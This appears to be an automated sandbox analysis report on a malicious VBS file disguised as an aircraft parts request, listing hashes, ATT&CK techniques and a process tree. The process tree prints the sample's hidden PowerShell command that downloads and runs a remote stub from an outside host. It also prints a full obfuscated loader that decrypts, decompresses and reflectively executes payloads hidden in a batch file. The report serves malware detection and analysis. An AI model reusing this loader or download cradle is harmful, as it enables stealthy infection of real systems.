051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320

General

Target

Needed Aircraft PN#_Desc_&_Qty Details.vbs
Size

91KB
MD5

7f67c01cf304afa0adf4c3095477ab07
SHA1

9c5e5e550e15b4e0e949591488ba72154e13378f
SHA256

051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320
SHA512

cbcf82588439f81719c5931b08176de77e3c7d08e22c084836ee3224dbbc6a96ebb4873cb2ac1d6d0225b6f7a8f8cef873fab3b54115e4cd8eb0ec1b623a7737
SSDEEP

1536:M8we4uQyXKFD5cFkWLcaxdYOyhGhRW9w+vcdlziIqzRNBHarEZ+2K:M8z4DOOW4eOFGhRW9wCIzi/8rE42K

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2652	powershell.exe
2148	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2652	powershell.exe
2148	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2196 wrote to memory of 2652	2196	WScript.exe	30
PID 2196 wrote to memory of 2652	2196	WScript.exe	30
PID 2196 wrote to memory of 2652	2196	WScript.exe	30
PID 2196 wrote to memory of 2956	2196	WScript.exe	32
PID 2196 wrote to memory of 2956	2196	WScript.exe	32
PID 2196 wrote to memory of 2956	2196	WScript.exe	32
PID 2956 wrote to memory of 2148	2956	cmd.exe	34
PID 2956 wrote to memory of 2148	2956	cmd.exe	34
PID 2956 wrote to memory of 2148	2956	cmd.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Needed Aircraft PN#_Desc_&_Qty Details.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2652
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('emte3ttqtxU8Z7uNtvShj79DDsvggmbvOto5AmNpef0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UMzwlReo+QuIcZAVBvu6GA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vpydZ=New-Object System.IO.MemoryStream(,$param_var); $whvQX=New-Object System.IO.MemoryStream; $NaCjv=New-Object System.IO.Compression.GZipStream($vpydZ, [IO.Compression.CompressionMode]::Decompress); $NaCjv.CopyTo($whvQX); $NaCjv.Dispose(); $vpydZ.Dispose(); $whvQX.Dispose(); $whvQX.ToArray();}function execute_function($param_var,$param2_var){ $JNCLx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MwOUn=$JNCLx.EntryPoint; $MwOUn.Invoke($null, $param2_var);}$toRQS = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $toRQS;$arTVC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($toRQS).Split([Environment]::NewLine);foreach ($ixRtZ in $arTVC) { if ($ixRtZ.StartsWith(':: ')) { $rZGXb=$ixRtZ.Substring(3); break; }}$payloads_var=[string[]]$rZGXb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
82KB

MD5
91521a30afc250ec301fbee04e3d72ec

SHA1
20c0d5e15643df6215f5052d70ad46d40da15fdd

SHA256
87f7bfaaf8f6babc9af3cb2b5de96b6365016121332bd90b8905674acd4940c4

SHA512
f9c61a01395eccccbb62ba2ce9cce4678da36b5a67a9712af98965c75cf126a740026bce576fe841b18ba018641842f845c007ad9e62dbde96b5cfd3b5299544

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
72720b367de3a0f65e11b0127b6b9818

SHA1
786b3e38896ff561df8321a0abae87b869125355

SHA256
66454c033be6a4cd3e33d4721740d28459f55c8dfc46f488e76baaa070638a6c

SHA512
e918497c1439409c2bae5667071dcb591b82b5b85860b8b28ef05e6daecd11ea267fda83865d03af063062cd0fb252215385d715dc8def87bcd0fc57a2fe063d

Download Submit
memory/2148-29-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2148-28-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2652-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2652-10-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-11-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-12-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-9-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-8-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-4-0x000007FEF642E000-0x000007FEF642F000-memory.dmp

Filesize
4KB

Download
memory/2652-6-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/2652-7-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing